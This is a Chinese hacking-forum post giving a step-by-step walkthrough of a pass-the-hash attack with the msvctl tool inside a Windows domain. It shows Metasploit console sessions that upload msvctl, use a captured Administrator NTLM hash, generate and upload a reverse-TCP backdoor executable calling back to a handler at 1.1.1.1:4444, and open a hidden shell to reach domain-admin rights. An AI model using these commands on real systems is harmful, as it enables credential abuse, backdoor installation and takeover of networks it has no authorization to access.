切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
161 HASH注入:msvctl[复制链接]
发表于 2012-10-1 23:39:59 | 显示全部楼层 |!read_mode!


前言

在windows 操作系统内网渗透的过程中,我们经常会碰上许多问题。

其中关于HASH这一块就比较多的问题,列如我们能够用常用的gsechash、gethashes等工具抓到windows的HASH散列值的话。也经常会有破解不了。

原因有二:

  • 一、你的彩虹表字典进行暴力破解时字典内容不够强大;现如今网上流传的是120G的彩虹表,可供破解14位以内大部分密码HASH散列值。
  • 二、你所抓取的HASH散列原本就是错误的。

在碰到这种情况下,我们往往会想到的就是HASH注入攻击。

HASH注入攻击是有很大的局限性的。

  • 一,拥有一台能够与你所攻击的机器进行网络共享的前提;
  • 二,必须拥有被攻击机器中用户的HASH散列值,如果你所拥有的机器上有一个帐户与被攻击帐号名密码是一样的情况下,可以尝试利用获取HASH散列的工具读取你本地HASH然后再进行攻击。
  • 三,必须拥有CMD交互式权限。因为进行HASH注入攻击的过程中会开启一个新的CMD SHELL。

我自已所架的模拟环境中测试过,在满足上面三个条情的情况下面才能够进行HASH注入攻击。

如果我们仅仅的是拥有一个以system权限值行的mssql进行内网渗透的话,完全没办法利用hash攻击;或者是我们用windows RPC溢出所获取的CMDSHELL进行HASH注入攻击也是不能够成功的。

其实,HASH注入攻击是非常简单的;我们只须要利用msvctl就能够开启新的继续权限的CMD SHELL进行攻击。

msvctl

我们在攻击过程中仅须要知道一个被攻击机器中用户的HASH散列值就可以进行攻击。
先获得权限和Hash


上传msvctl


  1. meterpreter > upload /home/brk/file/msvctl/msvctl.exe msvctl.exe
  2. [*] uploading  : /home/brk/file/msvctl/msvctl.exe -> msvctl.exe
  3. [*] uploaded   : /home/brk/file/msvctl/msvctl.exe -> msvctl.exe
  4. meterpreter > upload /home/brk/file/msvctl/msvctl.
  5. msvctl.dll msvctl.exe
  6. meterpreter > upload /home/brk/file/msvctl/msvctl.dll msvctl.dll
  7. [*] uploading  : /home/brk/file/msvctl/msvctl.dll -> msvctl.dll
  8. [*] uploaded   : /home/brk/file/msvctl/msvctl.dll -> msvctl.dll
  9. meterpreter >
复制代码
取得SHELL 映射一个域的用户的C盘 提示无权限



我们进行域注入
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
上传一个DOOR


  1. msf  payload(reverse_tcp) > generate -t exe -f /tmp/door.exe
  2. [*] Writing 73802 bytes to /tmp/door.exe...
  3. msf  payload(reverse_tcp) > use exploit/multi/handler
  4. msf  exploit(handler) > exploit -j
  5. [*] Exploit running as background job.

  6. [*] Started reverse handler on 1.1.1.1:4444
  7. [*] Starting the payload handler...

  8. msf  exploit(handler) > sessions -i 1
  9. [*] Starting interaction with 1...

  10. meterpreter > upload /tmp/door.exe door.exe
  11. [*] uploading  : /tmp/door.exe -> door.exe
  12. [*] uploaded   : /tmp/door.exe -> door.exe
  13. meterpreter >
复制代码

注入测试


取得了新的会话 连接他


  1. C:\windows\system32>exit
  2. meterpreter > background
  3. [*] Backgrounding session 2...

  4. msf > sessions -i 3
  5. [*] Starting interaction with 3...
  6. meterpreter > execute -f cmd.exe -i -c -H
  7. Process 1312 created.
  8. Channel 2 created.
  9. Microsoft Windows XP [�汾 5.1.2600]
  10. (C) ��Ȩ���� 1985-2001 Microsoft Corp.

  11. C:\WINDOWS\system32>
复制代码

测试对域管理是否有操作权限 我们成功了






附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-25 07:20

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部